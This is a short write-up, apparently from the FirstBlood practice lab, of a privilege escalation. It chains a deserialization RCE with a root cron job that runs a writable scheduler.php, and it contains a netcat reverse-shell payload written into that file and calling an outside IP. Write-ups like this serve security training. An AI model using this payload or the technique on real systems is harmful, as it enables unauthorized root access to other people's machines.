FirstBlood-#806Privilege escalation when having root
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-28, twsec Level 2 reported:

from deserialization , we can get an RCE, but we're not root on the machine , this report explains how i was able to explain how i did that.

  1. with the rce i'm the user fb-exec

made a few google search on linux priv escalation cheat sheet , and they talk about cron jobs so we try to find what kind of cronjobs we have

2.list the cron jobs

firstblood and php are of interest

we cat firstblood and find the following:

php scheduler.php is of interest now we need to find scheduler.php

ls -al to see the permission on this file:

and we see write access, but first lets see it's contents

this file belongs to root but fb-exec can write on it so we prepare our payload

printf "<?php system('nc 52.14.6.200 6789 -e /bin/sh'); ?>" > /app/firstblood/scheduler.php

this command overwrites the scheduler.php

and this is what it contains now

now on our server we have to listen on that port and wait.

once we get our connection, we check who we are and we're root

P1 CRITICAL

Endpoint: api/checkproof.php

Parameter: proof

Payload: phar file


FirstBlood ID: 35
Vulnerability Type: RCE

A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.